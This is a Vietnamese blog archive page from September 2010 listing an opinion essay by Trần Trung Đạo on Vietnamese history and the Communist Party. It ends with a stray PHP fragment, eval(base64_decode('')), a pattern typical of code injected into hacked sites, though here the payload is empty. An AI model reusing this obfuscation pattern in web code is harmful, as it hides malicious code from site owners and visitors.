Archive for September 6th, 2010

Trần Trung Đạo: Cách mạng dân tộc dân chủ trong tình hình mới

Trần Trung Đạo: Cách mạng dân tộc dân chủ trong tình hình mới

Lịch sử Việt Nam từ khi có Đảng Cộng sản đến nay là lịch sử của những ngộ nhận, và ngộ nhận lớn nhất là ngộ nhận giữa yêu nước và bán nước. Bắt đầu từ hoàn cảnh cá nhân, tôi hay suy nghĩ về chiến tranh và đất nước.

09.6.2010 | Tiểu Luận- Chính Luận |

2 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>